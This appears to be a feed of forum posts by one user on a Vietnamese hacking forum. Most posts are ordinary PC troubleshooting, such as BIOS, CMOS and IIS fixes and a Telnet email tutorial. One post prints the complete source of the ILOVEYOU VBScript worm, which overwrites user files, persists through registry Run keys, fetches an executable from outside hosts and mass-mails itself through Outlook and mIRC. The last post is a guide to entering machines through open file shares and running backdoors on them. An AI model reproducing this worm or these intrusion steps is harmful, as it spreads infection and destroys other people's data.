<![CDATA[Messages posted by "legendayhacker"]]> /hvaonline/posts/listByUser/125013.html JForum - http://www.jforum.net Lỗi không chạy trực tiếp được các application trên winxp

louisenguyen wrote:
Em cung bị lỗi tương tự , bác post cách help em với 
Mình repair thế nào à . Bạn cho đĩa cài Windows vào và chọn Install ( Upgrade chứ không phải new Install nha ) rồi đợi khoảng 20' thì xong. Vậy thôi :D) :D) :D) ]]> /hvaonline/posts/preList/5618/75225.html#75225 /hvaonline/posts/preList/5618/75225.html#75225 GMT Cách chạy Php Trong ISS ?

low1059 wrote:
Tôi đã cài xong ISS và chạy asp bình thường, nhưng khi cài thêm php vào thì không chạy được, các bác có thể chỉ giúp cấu hình của ISS để chạy php. Cảm ơn ! 
Bạn có thể tham khảo ở đây. http://www.diendantinhoc.net/tute/hethong/IIS-Perl-PHP-MySQL-duyson/ ]]> /hvaonline/posts/preList/9168/53244.html#53244 /hvaonline/posts/preList/9168/53244.html#53244 GMT Không vào được WinXP

bk2000 wrote:
máy mình tự nhiên hiện màn hình màu xanh có mấy dong" dump physical memory......(  
Đoạn này mình nghĩ là do RAM bị lỗi nên bạn thử kiểm tra lại RAM xem sao .Mình nghĩ máy chạy rất chậm cũng có thể là do nguyên nhân này.
ko thể vào bios, mình bỏ đĩa win vào cài lại thì báo là ko co hard disk drives và ko cho cài win. Sau đó, mình tháo pin bios ra thì vào được win nhưng cũng rất chậm, mình thử gắn pin vào lại hoặc thay đổi bios ( ngày, giở)  
Ko vào được Bios thì hơi lạ đấy Ko nhẽ lại nói BIOS có vấn đề. :mrgreen: Nếu bạn kiểm tra Ram mà ko sao thì tớ nghĩ là đến việc kiểm tra lại Main rồi, đi ra hàng xem nó sửa thế nào // Hôm trước mình cũng có thằng bạn bị như vậy ,cho đĩa WINDOWS vào mà ko cài được ( cũng báo lỗi y như bạn mô tả ) cuối cùng nó mang đi bảo hành Đổi con Main mới Bạn thử nhé xem có ăn thua gì ko .]]> /hvaonline/posts/preList/9164/53234.html#53234 /hvaonline/posts/preList/9164/53234.html#53234 GMT Lỗi khi boot máy

zombie01 wrote:
Máy của em khi bật lên thì thấy báo " CMOS Chesksum error_Defaults loaded " rồi im re. Ai biết xin chỉ giùm. 
Mình thì nghĩ rằng : Thay vì đi mua Pin mới như mấy bạn kia nói :mrgreen: :mrgreen: Thì ta cứ thử cách này xem sao có mất gì đâu nào: B1: Bật máy B2 : Nhấn Del( F2) // Tức là vào Bios B3: Chọn phần Load Default config. B4: Save and Restart B5: Nếu mà vẫn báo như trên thì đi mua PIN thôi ( còn ko thì ta lại dùng tiếp sợ gì nào :D) :D) :D) :D) )]]> /hvaonline/posts/preList/9146/53233.html#53233 /hvaonline/posts/preList/9146/53233.html#53233 GMT Máy tính hay tự bật lên ( giúp mình với)

DigitalLove wrote:
Cho mình hỏi làm cách nào để tắt chức năng Wake on LAN? Mình chẳng biết BIOS là gì cả, hic. Lại còn CMOS nữa. Rối tung lên. 
Thế này nhé. B1 : Bạn cắm điện B2 : Nhấn Power :mrgreen: B3 : Nhìn ngồi nhìn màn hình khởi động .( thông thường thì chỉ cần nhấn nút DEL (delete) là vào Bios , đôi khi nhấn F2 ,) Trên màn hình sẽ có chỉ dẫn nhấn vào phím nào thì vào Bios. B4 : Sau khi vào Bios thì tìm phần Wake on lan chỉnh lại thôi ( Cứ hí hoáy nghịch tí đi ko sợ đâu có gì thiết lập sai ko chạy nữa thì tháo pin( hoặc gạt nẫy reset) ra nhờ nó reset lại Bios là xong) B5 : Sau khi chỉnh xong nhớ save lại và Restart . B6 : Ngồi chơi xơi nước vào Windows làm việc tiếp .. :D) :D) :D) :D) :D) ]]> /hvaonline/posts/preList/9062/52979.html#52979 /hvaonline/posts/preList/9062/52979.html#52979 GMT Bạn có khả năng đọc nhanh bằng vận tốc ánh sáng? Lỗi gì đây ạ
Em mới chỉ chuyển từ trang 2 về trang 1 thế mà báo đọc bằng vận tốc anh sáng :mrgreen: :mrgreen: :mrgreen: :mrgreen: :mrgreen: bác conmale xem thế nào thế :lol:) :lol:) :lol:) ]]> /hvaonline/posts/preList/6042/35467.html#35467 /hvaonline/posts/preList/6042/35467.html#35467 GMT Mình cần cuốn cẩm nang lập trình hệ thống /hvaonline/posts/preList/5658/33333.html#33333 /hvaonline/posts/preList/5658/33333.html#33333 GMT Hacking Exposed 2: Network Security Secrets & Solutions - Cuốn Sách Hay /hvaonline/posts/preList/5069/33332.html#33332 /hvaonline/posts/preList/5069/33332.html#33332 GMT Lỗi không chạy trực tiếp được các application trên winxp /hvaonline/posts/preList/5618/33167.html#33167 /hvaonline/posts/preList/5618/33167.html#33167 GMT Lỗi không chạy trực tiếp được các application trên winxp /hvaonline/posts/preList/5618/33058.html#33058 /hvaonline/posts/preList/5618/33058.html#33058 GMT Chúc mừng sự trở lại của HVA và xin đưa ra 1 lỗi nhỏ !

buicathung wrote:
Chào mừng HVA trở lại !!!!!!!!! ^^ he he lâu quá rồi mới HVA mới open trở lại ^^ Vụ này có khi lại phải làm quả offline để gắn bó đoàn kết cái nhỉ.  
sau bao ngày xa cách HVA ( ban đầu ngày nào cũng nhấn xem HVA hồi phục chưa ) sau rồi lâu quá ,hôm nay nghĩ thế nào em nhấn vô HVA đã trở lại . Hix dạo này em cũng thế, cũng đã trở lại sau một thời lãng quên Hibernate chuyện học hỏi tìm tòi ( đi phưu lưu ái tình ) :oops: :oops: éc bây giờ lại trở lại ( hix tý thì quên cả password) dài quá may mà nhớ ra đăng nhập vào đây post bài .( chẳng biết bác nào còn nhớ mình không ) chắc chẳng còn ai. THôi kệ em lại tham gia ,quả này phải cố gắng mới được 3 năm tranining skill. Chúc mừng HVA comeback. :P) :P) :P) :P) Bác bùi cả thúng làm quả offline đê ,anh em gặp nhau đoàn kết. CÒn lão đấu với mình cốc rượu đâu rồi còn nhớ thằng em này không .]]> /hvaonline/posts/preList/4558/27175.html#27175 /hvaonline/posts/preList/4558/27175.html#27175 GMT Thắc mắc về việc kết nối Internet

_VoT_ wrote:
Máy sử dụng win XP pack 2, vừa format lại ổ cứng và cài lại win .....nhưng làm xong thì ko sử dụng được net nữa. Mình đã kiểm tra dây và modem......ai có thể góp ý giúp được ko? Mình nghĩ là chưa cài driver cho card mạng...nhưng cài ntn ? Ai giúp với đc ko? 
Kiểm tra dây và modem là như thế nào: Bạn đã cấu hình lại modem chưa . nếu chưa thì làm đi đã.. ]]> /hvaonline/posts/preList/3861/22645.html#22645 /hvaonline/posts/preList/3861/22645.html#22645 GMT Lỗi CMOS/GPNV Checksum Bad + CMOS Date/Time Not Set?????

oi_cuoc_doi wrote:
Máy tinh của mình mỗi khi bật thì xuất hiện : CMOS/GPNV Checksum Bad CMOS Date/Time Not Set Press F4 to Setup Mình đã kiểm tra Pin CMOS vẫn còn điện, Clear Jum CMOS, Cài lại Win. Lần nào tắt điện bật máy lên đều bị như vậy. Sau 1 tuần bị như vậy thì 1 cái ổ cứng của minh đã bị tèo, kô biết có liên quan đên nhau kô? Mọi người có kinh nghiệm giúp mình với. 
Giờ sau khi thay HDD còn báo không :mrgreen: :mrgreen: nói bảo chưa set thì mình vào set thôi : cứ vô setup đơn giản nhất là chọn chế độ default của nó là ổn mà. :lol:) :lol:) ]]> /hvaonline/posts/preList/3755/22020.html#22020 /hvaonline/posts/preList/3755/22020.html#22020 GMT Telnet là gì?

dangkhs wrote:
Cho em hỏi: Telnet là gì? và tìm nó ở đâu? 
Bạn vô windows nhấn (F1) gọi help và đánh vào chữ Telnet nó hướng dẫn rất cụ thể ( mọi thắc mắc sẽ được giải quyết ) Còn dưới đây là bài mình sưu tầm được bạn đọc qua xem sao. -------------------------------------------------------------------------------- Tác giả :W_Hat Cách sử dụng telnet và ứng dụng : 1- Giới thiệu: Telnet là một chương trình cho phép bạn kết nối và đăng nhập vào một máy tính ở xa (trong LAN, internet). Khi kết nối thành công, máy tính của bạn sẽ thực hiện chức năng như trạm trung gian để gửi yêu cầu đến máy tính ở xa. Bạn có thể dùng máy tính của mình để truy cập thông tin, thực thi các chương trình và sử dụng một số tài nguyên khác trên máy tính ở xa. 2- Sử dụng telnet: Bắt đầu từ command prompt, gõ vào telnet, nếu bạn dùng 9x, nó sẽ đưa bạn vào trình windows telnet. Bạn cũng có thể chạy ở menu Start/Run. Ở chế độ đánh lệnh, bạn có thể dùng các lệnh sau: OPEN <hostname/site address> <port number> : mở một kết nốI đến máy tính ở xa, gọi là 1 telnet session CLOSE : đóng kết nối và trở về dấu nhắc đợI lệnh QUIT: đóng kết nối và thoát telnet <ENTER> : nhấn phím enter sẽ đưa bạn thoát khỏI chế độ dấu nhắc lệnh và trở lại telnet session SET ECHO: bật/tắt chế độ hiện các lệnh đánh vào trong windows telnet. Lưu ý trong 2k sẽ là SET LOCAL_ECHO Để kết nối, ta dùng lệnh OPEN hoặc cũng có thể trực tiếp bằng lệnh telnet <hostname/site address> <port number> vd: telnet anyhost.com 12345 Trying 123.123.112.12 port 12345 Connected to anyhost.com Escape character is…. Sau khi kết nối xong, bạn đã ở trong một telnet session. Có thể dùng kí tự escape ở trên để trở về dấu nhắc lệnh. 3- Ứng dụng telnet để truy cập POP email: a- Ðọc mail: Các internet mail server cho phép truy cập thông qua giao thức POP (Post Office Protocol), cổng 110. Nếu POP server bạn đang dùng là anyhost.com, thì ta sẽ dùng lệnh sau: telnet anyhost.com 110 Một số các lệnh có thể bạn cần dùng khi truy cập POP email USER <username> : mở hộp thư của username PASS <password> : mật khẩu cho hộp thư LIST : liệt kê các emails trong hộp thư RETR <email number> : xem thư có thứ tự là number, được liệt kê trong lệnh LIST TOP <email number> <message lines> : xem thư như RETR, nhưng dừng lại khi hiện được số dòng nhất định DELE <email number> : xóa thư có thứ tự number QUIT : đóng telnet session Ví dụ, ta sẽ truy cập vào yahoo để xem mail, ta thực hiện lệnh: telnet pop.mail.yahoo.com 110 <enter> và chờ một chút... Nếu thành công, bạn sẽ nhận được dòng thông tin sau: +OK hello from popgate Kể từ đây, nếu trước khi mở 1 telnet session, bạn có dùng SET ECHO, thì những gì bạn đánh vào sẽ hiện lên, không thì bạn phải nhập các lệnh thật chính xác Nhập tên user USER w_hat95 +OK password required Nhập mật khẩu PASS anhyeuemnhieulam +OK maildrop ready, 2 messages (2983 octets) (34232 2324232) Ở đây, mail box của tôi có 2 tin, kế đến là tổng kích thước của các email, các số còn lại bạn không cần quan tâm Bạn dùng lệnh list để liệt kê các email, bao gồm stt và size: list 1 1728 2 1205 . Ðể xem một mail có stt nào đó, bạn dùng lệnh retr <message number> retr 1 Chờ một chút, bạn sẽ nhận được những thông tin đầy đủ về mail đó, bao gồm toàn bộ header và nội dung vd: +OK 1783 octets X-Apparently-To: w_hat95@yahoo.com via web20306.mail.yahoo.com; 04 Jan 2002 23:4 8:08 -0800 (PST) X-RocketRCL: 1037;1;2465408753 Received: from web11904.mail.yahoo.com (216.136.172.18) by mta621.mail.yahoo.com with SMTP; 04 Jan 2002 23:48:08 -0800 (PST) Message-ID: <20020105074808.35179.qmail@web11904.mail.yahoo.com> Received: from [61.214.156.105] by web11904.mail.yahoo.com via HTTP; Fri, 04 Jan 2002 23:48:08 PST Date: Fri, 4 Jan 2002 23:48:08 -0800 (PST) From: Joel <joel@yahoo.com> Subject: Re: hi? To: F M <w_hat95@yahoo.com> In-Reply-To: <20020102080654.68330.qmail@web20307.mail.yahoo.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-888944639-1010216888=:34368" ......vvv . Về những thông tin trong email header,bạn tự tìm hiểu lấy! :)) Nếu những thông tin liệt kê ở trên quá nhiều, bạn không kịp xem, hãy dùng lệnh top <mess number> <showed lines> để liệt kê theo số lượng dòng nhất định vd: top 1 10 -> sẽ liệt kê 10 dòng đầu (kể cả header) của email số 1, sau khi hiện xong 10 dòng cho bạn xem, chờ vài giây, nó sẽ tiếp tục hiện các dòng kế tiếp cho đến khi toàn bộ email được xem!? Ðể xóa 1 email, bạn dùng lệnh dele <email number> vd: dele 2 -> sẽ xóa email thứ 2 trong danh sách Sau khi check xong emails, bạn đóng telnet session bằng lệnh QUIT, bạn sẽ được đưa về dấu nhắc lệnh Bất lợi của việc check email POP dùng telnet là bạn không có được giao diện dễ nhìn như các trình check POP mail khác. Bạn cũng không thể trả lời từ các mail đã đọc được. b- Gửi mail: Tương tự như trên, các internet mail server sẽ cung cấp một giao thức là SMTP (Simple Mail Transfer Protocol) cho phép bạn send email thông qua server đó, cổng 25. Một số lệnh bạn cần dùng: HELO <hostname> : giới thiệu host, thông tin này không cần thiết MAIL FROM: <email của người gửi> RCPT TO: <emails của người nhận> DATA <nhập data của bạn>: sau khi enter, bạn nhập nội dung email. Sau khi nhập xong, muốn kết thúc, bạn phải xuống hàng và nhập dấu chấm '.' RSET xóa các thông tin lần gửi mới nhất, dùng khi bạn muốn gửi đến một người khác QUIT : thoát HELP <lệnh> xem trợ giúp về các lệnh, lệnh này tùy thuộc vào mail server bạn đang connect Ví dụ, đối với yahoo: Bạn thực hiện lệnh telnet smtp.mail.yahoo.com 25 Chờ một lúc, nếu kết nối thành công, bạn sẽ nhận được thông tin sau: 220 smtp011.mail.yahoo.com ESMTP Kết nối: helo smtp.mail.yahoo.com 250 smtp011.mail.yahoo.com Nhập thông tin người gửi: mail from: w_hat95@yahoo.com 250 ok Nhập thông tin người nhận: rcpt to: joel@yahoo.com Joel 250 ok Nhập nội dung: data blsdfsdfsd 354 go ahead Subject: hi Joel, how r u these days? Hi Joel, R u busy this late evening? If ur free, get to Mo^.ng Mo* bar. I need to talk to you. See ya, W_Hat . 250 ok 1010373599 qp 48077 Ðóng telnet session Quit Bạn có thể thao khảo một ví dụ về send mail thông qua SMTP tại: http://www.kbcafe.com/articles/smtp.html ps: các ví dụ trên đã test trên Windows 2000, các bạn có thể thực hiện tương tự trên Windows 9x. Tùy mail server mà các thông tin xác nhận và thông báo các lệnh của bạn có thể khác nhau. -------------------------------------------------------------------------------- ]]> /hvaonline/posts/preList/3653/21225.html#21225 /hvaonline/posts/preList/3653/21225.html#21225 GMT CODE virut "I Love You" Code:
rem barok -loveletter(vbe) <i hate go to school>

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /

Manila,Philippines

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=""

ctr=0

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout")

if (rr>=1) then

wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting

Host\Settings\Timeout",0,"REG_DWORD"

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"\MSKernel32.vbs")

c.Copy(dirwin&"\Win32DLL.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

regruns()

html()

spreadtoemail()

listadriv()

end sub

sub regruns()

On Error Resume Next

Dim num,downread

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

",dirsystem&"\MSKernel32.vbs"

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi

n32DLL",dirwin&"\Win32DLL.vbs"

downread=""

downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Download Directory")

if (downread="") then

downread="c:\"

end if

if (fileexist(dirsystem&"\WinFAT32.exe")=1) then

Randomize

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj

w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif num = 2 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif num = 3 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm

POhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif num = 4 then

regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX

.exe"

end if

end if

if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then

regcreate

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI

X",downread&"\WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start

Page","about:blank"

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&"\")

end if

Next

listadriv = s

end sub

sub infectfiles(folderspec)

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")

or (ext="hta") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set cop=fso.GetFile(f1.path)

cop.copy(folderspec&"\"&bname&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="jpg") or (ext="jpeg") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3") or (ext="mp2") then

set mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close

set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

if (eq<>folderspec) then

if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or

(s="script.ini") or (s="mirc.hlp") then

set scriptini=fso.CreateTextFile(folderspec&"\script.ini")

scriptini.WriteLine "[script]"

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,

if mIRC will"

scriptini.WriteLine " corrupt... WINDOWS will affect and will not run

correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine ";"

scriptini.WriteLine "n0=on 1:JOIN:#:{"

scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"

scriptini.WriteLine "n2= /.dcc send $nick

"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine "n3=}"

scriptini.close

eq=folderspec

end if

end if

next

end sub

sub folderlist(folderspec)

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end sub

sub regcreate(regkey,regvalue)

Set regedit = CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end sub

function regget(value)

Set regedit = CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end function

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

set regedit=CreateObject("WScript.Shell")

set out=WScript.CreateObject("Outlook.Application")

set mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)

if (regv="") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)

if (regad="") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject = "ILOVEYOU"

male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."

male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

male.Send

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"

end if

x=x+1

next

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

else

regedit.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

end if

next

Set out=Nothing

Set mapi=Nothing

end sub

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META

NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _

"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?

@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _

"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is

good...@-@>"&vbcrlf& _

"<?-?HEAD><BODY

ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ "&vbcrlf& _

"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#

-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read

this HTML file<BR>- Please press #-#YES#-# button to Enable

ActiveX<?-?p>"&vbcrlf& _

"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@

BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>

"&vbcrlf& _

"<?-?BODY><?-?HTML>"&vbcrlf& _

"<script language=@-@JScript@-@>"&vbcrlf& _

"<!--?-??-?"&vbcrlf& _

"if (window.screen){var wi=screen.availWidth;var

hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"&vbcrlf& _

"<script LANGUAGE=@-@VBScript@-@>"&vbcrlf& _

"<!--"&vbcrlf& _

"on error resume next"&vbcrlf& _

"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _

"aw=1"&vbcrlf& _

"code="

dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _

"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _

"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _

"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _

"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _

"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _

"wri.write code4"&vbcrlf& _

"wri.close"&vbcrlf& _

"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _

"if (err.number=424) then"&vbcrlf& _

"aw=0"&vbcrlf& _

"end if"&vbcrlf& _

"if (aw=1) then"&vbcrlf& _

"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _

"window.close"&vbcrlf& _

"end if"&vbcrlf& _

"end if"&vbcrlf& _

"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _

"regedit.RegWrite

@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru

n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"

dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")

dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")

dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")

dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")

dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")

dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")

dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")

dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")

set fso=CreateObject("Scripting.FileSystemObject")

set c=fso.OpenTextFile(WScript.ScriptFullName,1)

lines=Split(c.ReadAll,vbcrlf)

l1=ubound(lines)

for n=0 to ubound(lines)

lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))

if (l1=n) then

lines(n)=chr(34)+lines(n)+chr(34)

else

lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"

end if

next

set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")

b.close

set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)

d.write dt5

d.write join(lines,vbcrlf)

d.write vbcrlf

d.write dt6

d.close

end sub
]]> /hvaonline/posts/preList/3390/20560.html#20560 /hvaonline/posts/preList/3390/20560.html#20560 GMT Acunetix Web Vulnerability Scanner Bạn đường của Hacker và Administrator

toolcracking wrote:
cái này free, xài khá được,giúp ích cho các bác trong footprinting stage. nếu ai có zdu2i, cũng đừng phê bình. http://rapidshare.de/files/29735743/Sam_Spade.exe 
Cái này version bao nhiêu hả bác . Em thấy dùng cũng khá tốt :P) ]]> /hvaonline/posts/preList/428/19797.html#19797 /hvaonline/posts/preList/428/19797.html#19797 GMT Acess share file Dạ em tìm thấy post lên để mọi người coi :Sưu tầm ạ. Acess share file Share file thì không cần phải nói ai cũng biết nhưng khi người ta share file là một cơ hội tốt để đột nhập của mình tính họ. Những chương trình đột nhập máy tính như backdoor thì tôi không phải giới thiệu các bạn đã biết . Tôi chỉ giới thiệu làm cách nào để chạy backdoor khi có share file . Một số lệnh trong NetBios cũng rất hữu ích(các bạn tự tìm hiểu lấy) tôi chỉ nêu một số lệnh phục cho việc xem và access Để lấy thông tin trên máy người share file thì C:\> nbtstat -a <tên người share file> -A <nhập IP> Nó sẽ thông báo những thông tin về máy người này trên mạng C:\> net view \<tên máy> Nó sẽ hiển thị những thư mục mà người này share. Lệnh này chỉ có thể hiển thị những thư mục share không ẩn . Còn hiển thị tất cả các share ẩn thì dùng một số chương trình có ở những trang norton.com hay lockdown.com Khi đã thấy share bạn dùng lệnh sau để tạo một ổ đĩa ảo trên máy mình C:\> net use <tên ổ địa do mình muốn> : \\<IP>\<sharename> Khi thực hiện được nó sẽ báo thành công ! Nếu như nó đòi pw khi truy nhập thì phải dùng chương trình có trang lockdown.com để lấy chương trình dò password share file Tôi có chương trình tên gì thì tôi quên rồi nhưng nếu bạn cần thì để tôi sẽ giới thiệu trang download sau. Khi đã xâm nhập thành công , công việc còn lại chỉ là chép backdoor vào ổ đĩa ảo này và chạy backdoor Để chạy được backdoor bạn phải chuyển sang ổ đĩa ảo mà bạn đã tạo và chép backdoor lên mà chạy. ------------------------------------------------------------------------------------------------------------------------------- Vài options về NBT Viết tắt của NetBIOS over TCP/IP NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ] -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names. -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh ví dụ cụ thể: >nbtstat -A 192.168.0.2 connect local area : Node IpAddress: [192.168.0.2] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- AT-M3 <00> UNIQUE Registered ATM <00> GROUP Registered AT-M3 <03> UNIQUE Registered AT-M3 <20> UNIQUE Registered ATM <1E> GROUP Registered ATM <1D> UNIQUE Registered ...<01> GROUP Registered MAC Address = 00-10-DC-1F-CF-FA Ý nghĩ của các chứ số nằm <XX> 00: base computernames and workgroups, also in "*" queries 01: master browser, in magic cookie 03: messaging/alerter service; name of logged-in user 20: resource-sharing "server service" name 1B: domain master-browser name 1C: domain controller name 1E: domain/workgroup master browser election announcement [?] (sưu tầm) ]]> /hvaonline/posts/preList/3424/19682.html#19682 /hvaonline/posts/preList/3424/19682.html#19682 